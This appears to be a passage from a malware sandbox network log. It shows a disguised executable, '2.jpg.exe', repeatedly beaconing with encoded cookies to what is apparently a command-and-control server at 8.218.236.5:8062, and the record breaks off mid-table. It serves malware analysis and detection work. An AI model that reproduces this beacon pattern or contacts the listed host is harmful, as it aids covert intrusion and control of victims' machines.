Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:34.533433914 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:34.863297939 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49779	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:35.293695927 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:35.615204096 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49780	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:36.040851116 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:36.361922979 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49781	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:36.793201923 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:37.118732929 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49782	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:37.548469067 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:37.862226963 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49783	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:38.316128969 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:38.652184010 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49784	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:39.085890055 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:39.405379057 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49785	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:39.856033087 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:40.194874048 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49786	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:40.625983000 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:40.954951048 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49787	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:41.385422945 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:41.708071947 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49788	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:42.138207912 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:42.462930918 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49789	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:42.916697025 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:43.251593113 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49790	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:43.697031021 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:44.026570082 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49791	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:44.460520983 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:44.779476881 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49792	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:45.214190006 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:45.538546085 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49793	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:45.963610888 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:46.283365011 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49794	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:46.710241079 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:47.027081013 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49795	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:47.481498957 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:47.810244083 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49796	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:48.242646933 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:48.562959909 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49797	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:49.000065088 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:49.327081919 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49798	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:49.758795977 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:50.077326059 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49799	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:50.518590927 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:50.849447012 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49800	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:51.275449991 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:51.592808962 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49801	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:52.027801037 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:52.352518082 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49802	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:52.779481888 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:53.090070963 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49803	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:53.525871038 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:53.848320961 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49804	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:54.279217005 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:54.600039005 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49805	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:55.030407906 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:55.357326984 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49807	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:55.794430017 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:56.120906115 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49808	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
